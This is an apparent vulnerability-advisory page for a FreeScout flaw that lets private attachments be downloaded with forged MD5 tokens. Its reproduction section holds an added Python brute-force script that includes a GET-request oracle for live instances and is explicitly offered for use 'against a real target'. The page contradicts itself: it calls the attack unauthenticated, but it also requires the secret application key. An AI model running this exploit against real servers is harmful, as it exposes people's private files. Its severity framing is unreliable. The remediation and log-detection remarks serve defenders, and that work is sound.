FreeScout Attachment Download Token Forgery Vulnerability Allowing Unauthenticated Access to Private Files

Vulnerability

A vulnerability in FreeScout prior to version 1.8.213 allows unauthenticated attackers to download private attachments by forging the download token, which is generated by a predictable method. The token is the MD5 hash of the application key combined with the attachment ID and the file size. Attachment IDs are sequential and file sizes fall within a small range that can be brute-forced, so an attacker can compute candidate tokens for any attachment and retrieve private files without any user credentials. Because the application key is one of the hash inputs, the brute force enumerates only the size term: the attacker must already hold the key to compute candidates, and the attack does not recover the key itself.

Impact

This vulnerability allows unauthorized access to private attachments by anyone who can reach the download endpoint, violating confidentiality and potentially breaching GDPR compliance.

Reproduction

To reproduce this vulnerability, first identify a target attachment ID (IDs are sequential, so neighbouring IDs of a known attachment are reasonable guesses). Then brute-force the size parameter from 1 to approximately 50,000. For each candidate size, compute the MD5 token from the application key, the attachment ID and the candidate size, and send a GET request to the attachment download endpoint with the forged token. An HTTP 200 response means the candidate size matched the real file size and the token is valid; the response body is the file. In the worst case this is about 50,000 requests per attachment, and the search stops at the first 200.
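The procedure above as an offline-runnable model, added here as an example and not code from the original page or from the FreeScout project. It assumes the token is md5(app_key . attachment_id . size) with plain string concatenation in that order, and it assumes a download route of the form /attachment/{id}/{token}; neither detail is stated on the page, so adjust both to the target. The "server" and the key are constructed stand-ins so the brute force can be exercised without a live instance.

```python
"""Offline model of the FreeScout attachment-token forgery (added example)."""
import hashlib
from urllib.request import Request, urlopen
from urllib.error import HTTPError


def forge_token(app_key: str, attachment_id: int, size: int) -> str:
    # ASSUMPTION: plain concatenation key + id + size, hashed with MD5.
    material = f"{app_key}{attachment_id}{size}".encode()
    return hashlib.md5(material).hexdigest()


def brute_force_size(app_key: str, attachment_id: int, accepts, max_size: int = 50_000):
    """Enumerate sizes 1..max_size and return (size, token) for the first
    token the oracle `accepts(token)` reports as valid (HTTP 200), else None.
    Only the size term is unknown here: the key must already be known."""
    for size in range(1, max_size + 1):
        token = forge_token(app_key, attachment_id, size)
        if accepts(token):
            return size, token
    return None


class ConstructedServer:
    """Stand-in for a vulnerable instance: it stores attachments with their
    real size and accepts any token that matches the weak formula."""

    def __init__(self, app_key: str, attachments: dict):
        self._key = app_key
        self._attachments = attachments  # id -> (size, content)

    def download(self, attachment_id: int, token: str):
        entry = self._attachments.get(attachment_id)
        if entry is None:
            return 404, b""
        size, content = entry
        if token != forge_token(self._key, attachment_id, size):
            return 403, b""
        return 200, content


def http_oracle(base_url: str, attachment_id: int, timeout: float = 10.0):
    """Build an oracle that probes a live target with GET requests.
    ASSUMPTION: the route layout; change it to the instance's real URL."""
    def accepts(token: str) -> bool:
        url = f"{base_url.rstrip('/')}/attachment/{attachment_id}/{token}"
        try:
            with urlopen(Request(url, method="GET"), timeout=timeout) as resp:
                return resp.status == 200
        except HTTPError:
            return False
    return accepts


# Constructed demo data: a known key and one private attachment of 1,337 bytes.
DEMO_KEY = "base64:Y29uc3RydWN0ZWQtZGVtby1rZXktbm90LXJlYWw="
DEMO_SERVER = ConstructedServer(DEMO_KEY, {42: (1337, b"private invoice contents")})


def demo():
    """Run the brute force against the constructed server; returns the
    recovered size, the forged token, the status and the downloaded bytes."""
    oracle = lambda tok: DEMO_SERVER.download(42, tok)[0] == 200
    found = brute_force_size(DEMO_KEY, 42, oracle)
    if found is None:
        return None
    size, token = found
    status, body = DEMO_SERVER.download(42, token)
    return size, token, status, body


if __name__ == "__main__":
    print(demo())
```

Against a real target, replace the oracle with `http_oracle(base_url, attachment_id)`. The search is bounded by the real file size, so small attachments fall within a few hundred requests; the burst of 403 responses for one attachment ID that precedes the first 200 is also the pattern a defender would look for in access logs.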

Remediation

Users should update to FreeScout version 1.8.213 or later, where this vulnerability has been fixed.

Added: Apr 21, 2026, 2:19 AM
Updated: Apr 21, 2026, 2:19 AM

Vulnerability Rating

Custom Algorithm
spread: 2.2
impact: 0.6
exploitability: 7.6
remediation: 7.7
relevance: 6.4
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.